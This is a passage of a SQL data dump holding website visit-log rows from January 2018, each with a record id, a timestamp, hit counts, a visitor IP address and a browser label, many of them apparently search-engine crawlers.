40,1515193703,1,1,0,0,'54.36.148.69','other'),(195241,1515194269,1,1,0,0,'46.188.73.177','msie'),(195242,1515194585,1,0,1,0,'66.249.69.57',''),(195243,1515194839,1,1,0,0,'54.36.148.189','other'),(195244,1515195146,1,1,0,0,'51.255.71.113','other'),(195245,1515195176,1,1,0,0,'35.226.23.240','other'),(195246,1515195290,1,1,0,0,'157.55.39.132','other'),(195247,1515195316,1,1,0,0,'54.36.148.20','other'),(195248,1515195736,1,1,0,0,'54.36.148.248','other'),(195249,1515195766,1,1,0,0,'54.36.149.82','other'),(195250,1515195855,1,1,0,0,'54.36.148.86','other'),(195251,1515196552,1,0,1,0,'66.249.69.119',''),(195252,1515196573,1,1,0,0,'54.36.148.245','other'),(195253,1515196614,1,1,0,0,'51.255.71.118','other'),(195254,1515196618,1,1,0,0,'54.36.148.154','other'),(195255,1515196933,1,1,0,0,'157.55.39.109','other'),(195256,1515197186,1,1,0,0,'54.36.148.33','other'),(195257,1515197557,1,1,0,0,'51.255.71.115','other'),(195258,1515198355,1,1,0,0,'54.36.149.85','other'),(195259,1515198625,1,1,0,0,'8.29.198.26','other'),(195260,1515198837,1,1,0,0,'54.36.149.88','other'),(195261,1515198924,1,1,0,0,'54.36.148.38','other'),(195262,1515199445,1,1,0,0,'54.36.148.68','other'),(195263,1515199745,1,0,1,0,'68.180.229.104',''),(195264,1515199893,1,1,0,0,'54.36.148.99','other'),(195265,1515201149,1,1,0,0,'54.36.148.111','other'),(195266,1515201271,1,1,0,0,'54.36.148.116','other'),(195267,1515201442,1,1,0,0,'54.36.148.162','other'),(195268,1515201880,1,0,1,0,'66.249.69.115',''),(195269,1515201916,1,1,0,0,'54.36.148.187','other'),(195270,1515202005,1,1,0,0,'54.36.148.19','other'),(195271,1515202430,1,1,0,0,'54.36.149.18','other'),(195272,1515202657,1,1,0,0,'54.36.148.30','other'),(195273,1515202723,1,1,0,0,'54.36.148.88','other'),(195274,1515203869,1,1,0,0,'54.36.148.198','other'),(195275,1515204119,1,1,0,0,'207.46.13.19','other'),(195276,1515204147,1,1,0,0,'54.36.148.234','other'),(195278,1515205111,1,1,0,0,'54.36.148.246','other'),(195279,1515205131,1,1,0,0,'54.36.148.200','other'),(195280,1515205315,1,0,1,0,'66.249.69.115',''),(195281,1515205676,1,1,0,0,'54.36.149.19','other'),(195282,1515206067,1,1,0,0,'54.36.148.85','other'),(195283,1515206262,1,1,0,0,'54.36.149.2','other'),(195284,1515206974,1,1,0,0,'54.36.149.79','other'),(195285,1515207153,1,1,0,0,'54.36.148.163','other'),(195286,1515207470,1,1,0,0,'54.36.148.12','other'),(195287,1515207814,1,1,0,0,'54.36.148.236','other'),(195288,1515207951,1,1,0,0,'54.36.149.61','other'),(195289,1515208135,1,1,0,0,'54.36.149.103','other'),(195290,1515208954,26,26,0,0,'142.4.200.37','other'),(195291,1515209215,1,1,0,0,'54.36.149.90','other'),(195292,1515209272,1,1,0,0,'54.36.148.28','other'),(195293,1515209277,1,1,0,0,'54.36.148.131','other'),(195294,1515209465,1,1,0,0,'8.29.198.26','other'),(195295,1515209670,1,1,0,0,'54.36.149.19','other'),(195296,1515210847,1,1,0,0,'54.36.149.6','other'),(195297,1515211010,1,1,0,0,'54.36.149.97','other'),(195298,1515211250,1,1,0,0,'54.36.148.62','other'),(195299,1515211404,1,1,0,0,'54.36.149.8','other'),(195300,1515211419,1,1,0,0,'54.36.148.193','other'),(195301,1515211470,1,1,0,0,'54.36.148.123','other'),(195302,1515212337,1,1,0,0,'54.36.149.16','other'),(195303,1515212428,1,1,0,0,'54.36.148.111','other'),(195304,1515212613,1,1,0,0,'54.36.149.86','other'),(195305,1515212786,1,1,0,0,'51.255.71.132','other'),(195306,1515212931,1,0,1,0,'66.249.69.121',''),(195307,1515213007,1,1,0,0,'157.55.39.214','other'),(195308,1515213321,1,1,0,0,'54.36.148.172','other'),(195309,1515213518,1,1,0,0,'54.36.149.40','other'),(195310,1515213713,1,1,0,0,'54.36.149.1','other'),(195311,1515213817,1,1,0,0,'54.36.148.48','other'),(195312,1515214486,1,0,1,0,'66.249.69.119',''),(195313,1515214575,1,1,0,0,'54.36.149.71','other'),(195314,1515214804,1,1,0,0,'157.55.39.214','other'),(195315,1515215340,1,1,0,0,'66.249.69.119','chrome'),(195316,1515215350,1,1,0,0,'66.249.69.59','chrome'),(195317,1515215521,1,1,0,0,'54.36.149.92','other'),(195318,1515216211,1,1,0,0,'157.55.39.213','other'),(195319,1515216590,1,1,0,0,'54.36.149.9','other'),(195320,1515216716,1,1,0,0,'54.36.148.35','other'),(195321,1515216738,1,1,0,0,'54.36.148.83','other'),(195322,1515217111,1,1,0,0,'54.36.148.29','other'),(195323,1515217233,1,1,0,0,'54.36.149.73','other'),(195324,1515217342,1,1,0,0,'207.46.13.130','other'),(195325,1515217828,1,1,0,0,'54.36.149.86','other'),(195326,1515217855,1,1,0,0,'54.36.148.237','other'),(195327,1515218140,1,1,0,0,'54.36.148.192','other'),(195328,1515218310,1,1,0,0,'54.36.148.204','other'),(195329,1515218410,1,1,0,0,'51.255.71.114','other'),(195330,1515218972,1,0,1,0,'66.249.69.57',''),(195331,1515219119,1,1,0,0,'54.36.149.57','other'),(195332,1515219227,1,1,0,0,'54.36.148.33','other'),(195333,1515219314,1,0,1,0,'68.180.229.104',''),(195334,1515219517,1,1,0,0,'54.36.149.106','other'),(195335,1515219790,1,1,0,0,'54.36.149.53','other'),(195336,1515219809,1,1,0,0,'51.255.71.116','other'),(195337,1515220074,1,1,0,0,'54.36.148.60','other'),(195338,1515220315,1,1,0,0,'54.36.149.47','other'),(195339,1515220324,1,1,0,0,'8.29.198.25','other'),(195340,1515220980,1,1,0,0,'54.36.148.168','other'),(195341,1515222129,2,2,0,0,'54.36.149.61','other'),(195342,1515222751,1,1,0,0,'54.36.148.161','other'),(195343,1515222790,1,1,0,0,'54.36.148.21','other'),(195344,1515223153,1,0,1,0,'66.249.69.121',''),(195345,1515223259,1,1,0,0,'54.36.148.145','other'),(195346,1515223407,1,1,0,0,'54.36.148.239','other'),(195347,1515223549,1,1,0,0,'54.36.149.67','other'),(195348,1515223977,1,0,1,0,'66.249.69.119',''),(195349,1515224164,1,1,0,0,'54.36.149.27','other'),(195350,1515224374,1,1,0,0,'54.36.149.87','other'),(195351,1515224383,15,15,0,0,'204.12.208.10','other'),(195352,1515224449,1,0,1,0,'66.249.69.59',''),(195353,1515224802,1,1,0,0,'54.36.148.207','other'),(195354,1515225377,1,1,0,0,'54.36.148.20','other'),(195355,1515225396,1,1,0,0,'54.36.149.46','other'),(195356,1515225601,1,1,0,0,'157.55.39.213','other'),(195357,1515226421,1,1,0,0,'54.36.148.107','other'),(195358,1515226611,1,1,0,0,'54.36.148.71','other'),(195359,1515226868,1,1,0,0,'54.36.149.56','other'),(195360,1515227069,1,1,0,0,'54.36.148.54','other'),(195361,1515227371,1,1,0,0,'54.36.148.138','other'),(195362,1515227588,1,1,0,0,'66.249.69.115','chrome'),(195363,1515227721,1,1,0,0,'54.36.148.184','other'),(195364,1515227989,1,1,0,0,'157.55.39.213','other'),(195365,1515228112,1,1,0,0,'54.36.148.136','other'),(195366,1515228725,1,1,0,0,'54.36.148.28','other'),(195367,1515229017,1,1,0,0,'66.249.69.115','chrome'),(195368,1515229578,1,1,0,0,'54.36.148.36','other'),(195369,1515230437,1,1,0,0,'54.36.149.32','other'),(195370,1515230653,1,1,0,0,'54.36.148.189','other'),(195371,1515230892,1,1,0,0,'54.36.148.156','other'),(195372,1515231296,1,1,0,0,'8.29.198.27','other'),(195373,1515232205,1,1,0,0,'54.36.149.63','other'),(195374,1515232519,1,1,0,0,'54.36.149.72','other'),(195375,1515232581,1,1,0,0,'54.36.148.82','other'),(195376,1515232999,1,1,0,0,'54.36.149.13','other'),(195377,1515233401,1,1,0,0,'54.36.149.101','other'),(195378,1515233573,1,1,0,0,'54.36.148.125','other'),(195379,1515233592,1,1,0,0,'54.36.148.171','other'),(195380,1515233675,1,1,0,0,'54.36.149.98','other'),(195381,1515233825,1,1,0,0,'51.255.71.113','other'),(195382,1515233863,1,1,0,0,'157.55.39.213','other'),(195383,1515234075,1,1,0,0,'54.36.148.45','other'),(195384,1515234523,1,1,0,0,'54.36.149.17','other'),(195385,1515234694,1,1,0,0,'109.121.163.75','other'),(195386,1515234699,1,1,0,0,'182.253.179.133','other'),(195387,1515234701,1,1,0,0,'27.113.26.193','other'),(195388,1515234708,1,1,0,0,'193.104.119.88','other'),(195389,1515234715,1,1,0,0,'94.155.195.235','other'),(195390,1515234722,1,1,0,0,'187.108.38.214','other'),(195391,1515234726,1,1,0,0,'168.0.96.24','other'),(195392,1515234742,1,1,0,0,'110.77.200.129','other'),(195393,1515234904,1,1,0,0,'196.61.29.106','other'),(195394,1515235032,1,1,0,0,'54.36.148.18','other'),(195395,1515235420,1,1,0,0,'141.8.142.74','other'),(195396,1515235426,1,1,0,0,'54.36.149.11','other'),(195397,1515236397,1,1,0,0,'54.36.148.52','other'),(195398,1515236740,1,1,0,0,'54.36.148.136','other'),(195399,1515237029,1,1,0,0,'157.55.39.214','other'),(195400,1515237050,1,1,0,0,'54.36.149.23','other'),(195401,1515237071,1,1,0,0,'54.36.148.202','other'),(195402,1515237479,1,1,0,0,'54.36.149.18','other'),(195403,1515238135,1,1,0,0,'54.36.148.164','other'),(195404,1515238935,1,1,0,0,'54.36.148.141','other'),(195405,1515239124,1,1,0,0,'54.36.148.68','other'),(195406,1515239524,1,1,0,0,'54.36.148.196','other'),(195407,1515239888,1,1,0,0,'54.36.148.147','other'),(195408,1515240043,1,1,0,0,'54.36.148.66','other'),(195409,1515240401,1,1,0,0,'54.36.148.113','other'),(195410,1515240696,1,1,0,0,'54.36.149.64','other'),(195411,1515240986,1,1,0,0,'54.36.148.91','other'),(195412,1515241234,1,1,0,0,'54.36.148.59','other'),(195413,1515241487,1,1,0,0,'54.36.148.157','other'),(195414,1515241678,1,1,0,0,'188.255.15.77','msie'),(195415,1515241950,1,1,0,0,'157.55.39.148','other'),(195416,1515242166,1,1,0,0,'8.29.198.25','other'),(195417,1515242395,1,1,0,0,'54.36.148.157','other'),(195418,1515242630,1,1,0,0,'54.36.148.101','other'),(195419,1515242849,1,0,1,0,'66.249.69.115',''),(195420,1515243404,1,1,0,0,'54.36.149.50','other'),(195421,1515243407,1,1,0,0,'157.55.39.214','other'),(195422,1515243581,1,1,0,0,'54.36.149.31','other'),(195423,1515243621,1,1,0,0,'178.95.157.236','chrome'),(195424,1515244068,1,0,1,0,'66.249.69.119',''),(195425,1515244125,1,1,0,0,'157.55.39.213','other'),(195426,1515244422,1,1,0,0,'54.36.148.164','other'),(195427,1515244749,1,1,0,0,'54.36.149.34','other'),(195428,1515245293,1,1,0,0,'54.36.148.109','other'),(195429,1515245652,1,1,0,0,'91.196.178.41','chrome'),(195430,1515245749,1,1,0,0,'54.36.149.34','other'),(195431,1515246242,1,1,0,0,'207.46.13.130','other'),(195432,1515247019,1,1,0,0,'54.36.149.43','other'),(195433,1515247162,1,1,0,0,'54.36.148.116','other'),(195434,1515247249,1,1,0,0,'54.36.149.47','other'),(195435,1515247317,1,1,0,0,'157.55.39.214','other'),(195436,1515247655,1,1,0,0,'54.36.148.44','other'),(195437,1515248325,1,1,0,0,'51.255.71.128','other'),(195438,1515248501,1,1,0,0,'46.211.114.110','chrome'),(195439,1515248768,1,1,0,0,'54.36.149.9','other'),(195440,1515248793,1,0,1,0,'66.249.69.119',''),(195441,1515249390,1,1,0,0,'157.55.39.214','other'),(195442,1515249392,1,1,0,0,'157.55.39.213','other'),(195443,1515249396,1,1,0,0,'54.36.148.86','other'),(195444,1515249555,1,1,0,0,'54.36.148.38','other'),(195445,1515250082,1,1,0,0,'91.196.178.101','chrome'),(195446,1515250416,1,1,0,0,'54.36.149.66','other'),(195447,1515251921,1,1,0,0,'87.250.224.46','other'),(195448,1515252609,1,1,0,0,'188.230.43.254','other'),(195449,1515252910,1,1,0,0,'54.36.149.96','other'),(195450,1515253015,1,1,0,0,'8.29.198.26','other'),(195451,1515253168,1,1,0,0,'54.36.149.26','other'),(195452,1515253723,1,1,0,0,'157.55.39.214','other'),(195453,1515253880,1,1,0,0,'54.36.148.73','other'),(195454,1515254176,1,1,0,0,'54.36.148.185','other'),(195455,1515254212,1,1,0,0,'54.36.149.69','other'),(195456,1515254471,1,1,0,0,'54.36.148.254','other'),(195457,1515254689,1,1,0,0,'157.55.39.148','other'),(195458,1515255006,1,1,0,0,'188.230.43.254','other'),(195459,1515255099,1,1,0,0,'54.36.148.173','other'),(195460,1515255258,1,1,0,0,'157.55.39.214','other'),(195461,1515255422,1,1,0,0,'54.36.149.47','other'),(195462,1515255595,1,1,0,0,'162.210.196.98','other'),(195463,1515256310,1,1,0,0,'95.24.202.205','msie'),(195464,1515256732,1,1,0,0,'54.36.149.51','other'),(195465,1515257407,1,1,0,0,'54.36.149.89','other'),(195466,1515257941,1,1,0,0,'54.36.148.91','other'),(195467,1515258249,1,1,0,0,'51.255.71.113','other'),(195468,1515258319,1,1,0,0,'54.36.148.41','other'),(195469,1515258459,1,1,0,0,'54.36.148.88','other'),(195470,1515258514,1,1,0,0,'54.36.148.130','other'),(195471,1515258533,1,0,1,0,'66.249.69.61',''),(195472,1515258840,1,1,0,0,'157.55.39.213','other'),(195473,1515258960,1,1,0,0,'54.36.148.42','other'),(195474,1515260052,1,1,0,0,'77.111.246.7','chrome'),(195475,1515260549,1,1,0,0,'54.36.149.42','other'),(195476,1515260629,1,1,0,0,'180.76.15.34','other'),(195477,1515260778,1,1,0,0,'54.36.148.121','other'),(195478,1515260902,1,1,0,0,'54.36.149.8','other'),(195479,1515261151,1,1,0,0,'157.55.39.213','other'),(195480,1515261385,1,1,0,0,'216.244.66.237','other'),(195481,1515261903,1,1,0,0,'54.36.148.99','other'),(195482,1515261911,1,1,0,0,'54.36.149.56','other'),(195483,1515262215,1,1,0,0,'51.255.71.115','other'),(195484,1515262219,1,1,0,0,'54.36.149.74','other'),(195485,1515262373,1,1,0,0,'54.36.148.63','other'),(195486,1515263311,1,1,0,0,'54.36.149.7','other'),(195487,1515263860,1,1,0,0,'8.29.198.25','other'),(195488,1515264266,1,0,1,0,'66.249.69.107',''),(195489,1515264279,1,1,0,0,'216.244.66.237','other'),(195490,1515264289,1,1,0,0,'54.36.149.92','other'),(195491,1515264442,1,1,0,0,'54.36.148.80','other'),(195492,1515264565,1,1,0,0,'54.36.148.139','other'),(195493,1515265013,1,1,0,0,'54.36.149.58','other'),(195494,1515265085,1,1,0,0,'54.36.148.145','other'),(195495,1515265714,1,1,0,0,'54.36.149.11','other'),(195496,1515265754,1,1,0,0,'54.36.149.9','other'),(195497,1515265764,1,1,0,0,'141.8.142.74','other'),(195498,1515266120,1,1,0,0,'54.36.149.75','other'),(195499,1515266232,1,1,0,0,'54.36.148.79','other'),(195500,1515266925,1,1,0,0,'54.36.148.68','other'),(195501,1515267013,1,1,0,0,'54.36.148.37','other'),(195502,1515267297,1,1,0,0,'54.36.148.39','other'),(195503,1515267941,1,1,0,0,'54.36.148.237','other'),(195504,1515268948,1,0,1,0,'66.249.69.99',''),(195505,1515268975,1,1,0,0,'54.36.149.8','other'),(195506,1515268990,1,1,0,0,'54.36.149.86','other'),(195507,1515269107,1,1,0,0,'54.36.148.242','other'),(195508,1515269319,1,1,0,0,'54.36.148.87','other'),(195509,1515269634,1,1,0,0,'37.110.33.126','msie'),(195510,1515269683,2,2,0,0,'141.8.142.74','other'),(195511,1515270144,1,1,0,0,'54.36.148.106','other'),(195512,1515270189,1,1,0,0,'54.36.148.137','other'),(195513,1515270226,1,1,0,0,'54.36.148.55','other'),(195514,1515270319,1,1,0,0,'54.36.148.250','other'),(195515,1515270560,1,1,0,0,'54.36.148.196','other'),(195516,1515271015,1,0,1,0,'66.249.69.109',''),(195517,1515272339,1,1,0,0,'176.67.11.96','chrome'),(195518,1515272944,1,0,1,0,'66.249.69.61',''),(195519,1515273719,1,1,0,0,'54.36.148.21','other'),(195520,1515273725,1,1,0,0,'54.36.148.161','other'),(195521,1515274470,1,1,0,0,'54.36.149.63','other'),(195522,1515274710,1,1,0,0,'8.29.198.25','other'),(195523,1515275867,1,1,0,0,'51.255.71.128','other'),(195524,1515275954,1,1,0,0,'54.36.148.23','other'),(195525,1515276244,1,1,0,0,'54.36.148.121','other'),(195526,1515276512,1,1,0,0,'54.36.148.124','other'),(195527,1515276626,1,1,0,0,'54.36.148.180','other'),(195528,1515277814,1,0,1,0,'66.249.69.115',''),(195529,1515278218,1,1,0,0,'207.46.13.130','other'),(195530,1515278295,1,1,0,0,'51.255.71.119','other'),(195531,1515278599,1,1,0,0,'54.36.148.174','other'),(195532,1515278690,1,1,0,0,'51.255.71.132','other'),(195533,1515278774,1,1,0,0,'207.46.13.127','other'),(195534,1515278895,1,1,0,0,'54.36.148.192','other'),(195535,1515281069,1,1,0,0,'54.36.148.21','other'),(195536,1515281110,1,1,0,0,'51.255.71.127','other'),(195537,1515281209,1,1,0,0,'54.36.148.235','other'),(195538,1515281627,1,1,0,0,'54.36.149.12','other'),(195539,1515281700,1,1,0,0,'54.36.149.47','other'),(195540,1515281724,1,1,0,0,'66.249.66.75','chrome'),(195541,1515281741,1,1,0,0,'66.249.66.149','chrome'),(195542,1515281919,1,1,0,0,'54.36.149.5','other'),(195543,1515283110,1,1,0,0,'51.255.71.123','other'),(195544,1515283394,1,1,0,0,'54.36.148.48','other'),(195545,1515283636,1,0,1,0,'66.249.66.75',''),(195546,1515284060,1,1,0,0,'54.36.148.232','other'),(195547,1515284215,1,1,0,0,'54.36.148.249','other'),(195548,1515284353,1,1,0,0,'157.55.39.148','other'),(195549,1515284451,1,1,0,0,'51.255.71.118','other'),(195550,1515284627,1,1,0,0,'54.36.148.34','other'),(195551,1515285251,1,1,0,0,'54.36.148.136','other'),(195552,1515285377,1,1,0,0,'54.36.148.200','other'),(195553,1515285495,1,1,0,0,'141.8.142.74','other'),(195554,1515285564,1,1,0,0,'8.29.198.26','other'),(195555,1515285645,1,1,0,0,'54.36.148.188','other'),(195556,1515286557,1,1,0,0,'54.36.149.19','other'),(195557,1515286580,1,1,0,0,'54.36.148.245','other'),(195558,1515286719,1,1,0,0,'54.36.148.65','other'),(195559,1515286897,1,0,1,0,'66.249.66.153',''),(195560,1515287026,1,1,0,0,'54.36.149.32','other'),(195561,1515287076,1,1,0,0,'54.36.148.113','other'),(195562,1515287153,22,22,0,0,'86.58.206.113','chrome'),(195563,1515287549,1,1,0,0,'54.36.149.95','other'),(195564,1515287637,1,1,0,0,'54.36.149.82','other'),(195565,1515287843,1,1,0,0,'54.36.148.189','other'),(195566,1515287875,1,1,0,0,'51.255.71.129','other'),(195567,1515287949,1,1,0,0,'54.36.149.86','other'),(195568,1515288135,18,18,0,0,'86.58.206.113','chrome'),(195569,1515288182,1,1,0,0,'54.36.148.134','other'),(195570,1515288779,1,1,0,0,'54.36.149.83','other'),(195571,1515289176,1,1,0,0,'54.36.149.88','other'),(195572,1515289567,1,1,0,0,'54.36.148.78','other'),(195573,1515290161,1,1,0,0,'46.48.13.161','chrome'),(195574,1515290783,1,1,0,0,'54.36.148.53','other'),(195575,1515291215,1,1,0,0,'54.36.148.52','other'),(195576,1515291291,1,1,0,0,'54.36.149.57','other'),(195577,1515291564,1,1,0,0,'54.36.149.85','other'),(195578,1515291993,1,1,0,0,'54.36.148.60','other'),(195579,1515292147,1,1,0,0,'107.167.108.250','other'),(195580,1515292340,1,1,0,0,'178.127.140.90','chrome'),(195581,1515292752,1,0,1,0,'66.249.66.155',''),(195582,1515293936,1,0,1,0,'66.249.66.149',''),(195583,1515295190,1,1,0,0,'141.8.142.74','other'),(195584,1515296411,1,1,0,0,'8.29.198.27','other'),(195585,1515296425,1,0,1,0,'66.249.66.75',''),(195586,1515297009,1,1,0,0,'5.167.121.68','msie'),(195587,1515297981,1,0,1,0,'66.249.66.155',''),(195588,1515298657,1,1,0,0,'141.8.142.74','other'),(195589,1515302043,1,0,1,0,'66.249.66.153',''),(195590,1515303597,1,1,0,0,'178.154.171.88','other'),(195591,1515303788,1,0,1,0,'66.249.66.75',''),(195592,1515307256,1,1,0,0,'54.36.148.74','other'),(195593,1515307258,1,1,0,0,'8.29.198.27','other'),(195594,1515307842,1,1,0,0,'54.36.149.42','other'),(195595,1515307846,1,1,0,0,'54.36.148.176','other'),(195596,1515307979,1,1,0,0,'54.36.148.39','other'),(195597,1515308476,1,1,0,0,'54.36.148.241','other'),(195598,1515308748,1,1,0,0,'54.36.148.78','other'),(195599,1515308785,1,1,0,0,'54.36.148.121','other'),(195600,1515308848,1,1,0,0,'54.36.149.91','other'),(195601,1515308886,1,1,0,0,'157.55.39.148','other'),(195602,1515309013,1,1,0,0,'54.36.149.9','other'),(195603,1515309054,1,0,1,0,'66.249.66.156',''),(195604,1515309159,1,1,0,0,'54.36.148.131','other'),(195605,1515309282,1,0,1,0,'66.249.66.157',''),(195606,1515309754,1,1,0,0,'54.36.149.34','other'),(195607,1515309941,1,1,0,0,'141.8.132.19','other'),(195608,1515309996,1,1,0,0,'207.46.13.127','other'),(195609,1515310006,1,1,0,0,'54.36.148.196','other'),(195610,1515310179,1,1,0,0,'54.36.148.132','other'),(195611,1515310293,1,1,0,0,'54.36.148.102','other'),(195612,1515310967,1,1,0,0,'54.36.148.118','other'),(195613,1515311609,1,1,0,0,'51.255.71.118','other'),(195614,1515312003,1,0,1,0,'66.249.66.157',''),(195615,1515312340,1,1,0,0,'54.36.148.25','other'),(195616,1515312417,1,0,1,0,'66.249.66.155',''),(195617,1515312473,1,1,0,0,'54.36.148.208','other'),(195618,1515312524,1,1,0,0,'54.36.148.198','other'),(195619,1515312575,1,1,0,0,'54.36.148.249','other'),(195620,1515312839,1,0,1,0,'66.249.66.75',''),(195621,1515313396,1,1,0,0,'54.36.148.139','other'),(195622,1515313424,1,1,0,0,'54.36.148.231','other'),(195623,1515313459,1,1,0,0,'54.36.149.65','other'),(195624,1515313646,1,1,0,0,'207.46.13.127','other'),(195625,1515313735,1,1,0,0,'54.36.149.3','other'),(195626,1515314659,1,0,1,0,'66.249.66.157',''),(195627,1515314711,1,1,0,0,'54.36.148.250','other'),(195628,1515314728,1,1,0,0,'54.36.148.135','other'),(195629,1515315092,1,1,0,0,'54.36.148.186','other'),(195630,1515315497,1,1,0,0,'54.36.148.196','other'),(195631,1515315789,1,1,0,0,'207.46.13.130','other'),(195632,1515316678,1,0,1,0,'66.249.66.156',''),(195633,1515316735,1,1,0,0,'46.211.101.169','chrome'),(195634,1515316778,1,1,0,0,'54.36.148.111','other'),(195635,1515317012,1,0,1,0,'66.249.66.157',''),(195636,1515317023,1,1,0,0,'91.209.11.236','other'),(195637,1515317703,1,1,0,0,'54.36.148.146','other'),(195638,1515318096,1,1,0,0,'8.29.198.26','other'),(195639,1515318374,1,1,0,0,'54.36.148.229','other'),(195640,1515318506,2,2,0,0,'178.151.245.174','other'),(195641,1515318607,1,1,0,0,'157.55.39.148','other'),(195642,1515319631,1,1,0,0,'54.36.148.72','other'),(195643,1515319635,1,1,0,0,'74.115.214.157','other'),(195644,1515319737,1,1,0,0,'54.36.148.54','other'),(195645,1515320126,1,1,0,0,'157.55.39.214','other'),(195646,1515320436,1,1,0,0,'54.36.148.111','other'),(195647,1515320610,1,1,0,0,'51.255.71.133','other'),(195648,1515320623,1,1,0,0,'54.36.149.66','other'),(195649,1515320782,1,0,1,0,'66.249.66.156',''),(195650,1515321250,1,1,0,0,'54.36.148.70','other'),(195651,1515321326,1,1,0,0,'54.36.148.201','other'),(195652,1515321475,1,1,0,0,'54.36.148.233','other'),(195653,1515321568,1,1,0,0,'13.56.229.65','chrome'),(195654,1515321601,1,1,0,0,'54.36.148.232','other'),(195655,1515321622,1,0,1,0,'66.249.66.75',''),(195656,1515321969,1,1,0,0,'91.196.178.130','chrome'),(195657,1515322276,1,1,0,0,'141.8.142.74','other'),(195658,1515322539,1,1,0,0,'54.36.148.190','other'),(195659,1515322818,1,1,0,0,'157.55.39.148','other'),(195660,1515322862,1,1,0,0,'54.36.148.36','other'),(195661,1515322969,1,1,0,0,'54.36.148.103','other'),(195662,1515323243,1,1,0,0,'216.244.66.237','other'),(195663,1515323755,1,1,0,0,'54.36.148.94','other'),(195664,1515323770,1,1,0,0,'54.36.149.24','other'),(195665,1515323907,1,0,1,0,'66.249.66.76',''),(195666,1515324104,1,1,0,0,'54.36.149.62','other'),(195667,1515325175,1,1,0,0,'54.36.149.92','other'),(195668,1515325531,1,1,0,0,'54.36.148.61','other'),(195669,1515325645,1,1,0,0,'178.140.235.245','msie'),(195670,1515325875,1,0,1,0,'66.249.66.156',''),(195671,1515326393,1,1,0,0,'157.55.39.214','other'),(195672,1515326681,1,1,0,0,'54.36.148.132','other'),(195673,1515326959,1,1,0,0,'54.36.149.72','other'),(195674,1515327025,1,0,1,0,'66.249.66.156',''),(195675,1515327327,1,1,0,0,'54.36.148.43','other'),(195676,1515327385,2,2,0,0,'54.36.148.121','other'),(195677,1515327889,1,1,0,0,'91.209.11.236','other'),(195678,1515328068,1,1,0,0,'54.36.149.57','other'),(195679,1515328202,1,1,0,0,'51.255.71.125','other'),(195680,1515328459,1,1,0,0,'95.46.160.252','chrome'),(195681,1515328951,1,1,0,0,'8.29.198.25','other'),(195682,1515330429,1,1,0,0,'66.249.66.74','chrome'),(195683,1515330436,1,1,0,0,'66.249.66.157','chrome'),(195684,1515331082,1,1,0,0,'54.36.148.238','other'),(195685,1515331243,1,1,0,0,'54.36.149.83','other'),(195686,1515331818,2,0,2,0,'66.249.66.155',''),(195687,1515331847,1,1,0,0,'51.255.71.116','other'),(195688,1515331852,1,1,0,0,'54.36.148.206','other'),(195689,1515332030,1,1,0,0,'54.36.148.200','other'),(195690,1515332464,1,0,1,0,'66.249.66.74',''),(195691,1515333084,1,0,1,0,'66.249.66.156',''),(195692,1515333157,1,1,0,0,'51.255.71.116','other'),(195693,1515333440,1,1,0,0,'54.36.148.244','other'),(195694,1515333547,1,1,0,0,'54.36.148.87','other'),(195695,1515333586,1,1,0,0,'54.36.149.89','other'),(195696,1515334027,1,1,0,0,'54.36.148.230','other'),(195697,1515334113,1,1,0,0,'5.228.16.59','msie'),(195698,1515334612,1,1,0,0,'54.36.149.55','other'),(195699,1515334827,1,1,0,0,'54.36.148.51','other'),(195700,1515335079,1,1,0,0,'54.36.148.147','other'),(195701,1515335088,1,1,0,0,'91.209.11.236','other'),(195702,1515335386,1,1,0,0,'54.36.148.247','other'),(195703,1515335665,1,1,0,0,'54.36.149.26','other'),(195704,1515335797,1,1,0,0,'54.36.149.71','other'),(195705,1515335801,1,1,0,0,'54.36.148.170','other'),(195706,1515335893,1,1,0,0,'54.36.148.59','other'),(195707,1515335904,1,1,0,0,'54.36.148.199','other'),(195708,1515336634,1,1,0,0,'51.255.71.127','other'),(195709,1515337319,1,1,0,0,'54.36.149.72','other'),(195710,1515337768,1,0,1,0,'66.249.66.156',''),(195711,1515337864,1,1,0,0,'54.36.149.89','other'),(195712,1515338209,1,1,0,0,'54.36.148.37','other'),(195713,1515338309,1,1,0,0,'54.36.148.159','other'),(195714,1515338609,1,1,0,0,'54.36.148.74','other'),(195715,1515338697,1,0,1,0,'66.249.66.155',''),(195716,1515339138,1,1,0,0,'54.36.149.102','other'),(195717,1515339680,1,1,0,0,'54.36.148.78','other'),(195718,1515339795,1,1,0,0,'8.29.198.26','other'),(195719,1515339950,1,1,0,0,'54.36.149.16','other'),(195720,1515340554,1,1,0,0,'202.138.127.66','other'),(195721,1515340618,1,1,0,0,'110.77.232.87','other'),(195722,1515340716,1,1,0,0,'191.252.120.93','other'),(195723,1515341131,1,1,0,0,'54.36.148.245','other'),(195724,1515341563,1,1,0,0,'54.36.149.72','other'),(195725,1515341584,1,1,0,0,'54.36.148.252','other'),(195726,1515342517,2,2,0,0,'37.187.75.71','other'),(195727,1515342719,1,1,0,0,'54.36.149.95','other'),(195728,1515343508,1,1,0,0,'54.36.148.58','other'),(195729,1515343543,2,2,0,0,'157.55.39.140','other'),(195730,1515344015,1,1,0,0,'54.36.148.180','other'),(195731,1515344120,1,1,0,0,'54.36.149.48','other'),(195732,1515344231,1,1,0,0,'54.36.148.46','other'),(195733,1515344429,1,1,0,0,'54.36.148.113','other'),(195734,1515344558,1,1,0,0,'54.36.148.179','other'),(195735,1515344578,1,1,0,0,'54.36.149.83','other'),(195736,1515344785,1,1,0,0,'54.36.149.11','other'),(195737,1515344956,1,1,0,0,'157.55.39.245','other'),(195738,1515345096,1,1,0,0,'216.244.66.237','other'),(195739,1515345313,1,1,0,0,'54.36.148.62','other'),(195740,1515345438,1,1,0,0,'213.179.252.228','chrome'),(195741,1515345594,1,1,0,0,'54.36.149.2','other'),(195742,1515345898,1,0,1,0,'66.249.66.74',''),(195743,1515346237,1,1,0,0,'54.36.148.147','other'),(195744,1515346404,1,1,0,0,'54.36.149.40','other'),(195745,1515346537,1,0,1,0,'66.249.66.157',''),(195746,1515346794,1,1,0,0,'54.36.148.105','other'),(195747,1515347264,1,1,0,0,'54.36.148.109','other'),(195748,1515347415,1,1,0,0,'54.36.148.50','other'),(195749,1515347433,1,1,0,0,'40.77.167.71','other'),(195750,1515347653,2,2,0,0,'157.55.39.245','other'),(195751,1515348334,2,2,0,0,'188.163.87.75','chrome'),(195752,1515348401,1,1,0,0,'108.59.8.70','other'),(195753,1515348510,1,1,0,0,'54.36.149.60','other'),(195754,1515348525,1,1,0,0,'54.36.148.88','other'),(195755,1515348672,1,1,0,0,'54.36.149.42','other'),(195756,1515348781,1,1,0,0,'54.36.148.57','other'),(195757,1515348798,1,1,0,0,'54.36.148.249','other'),(19575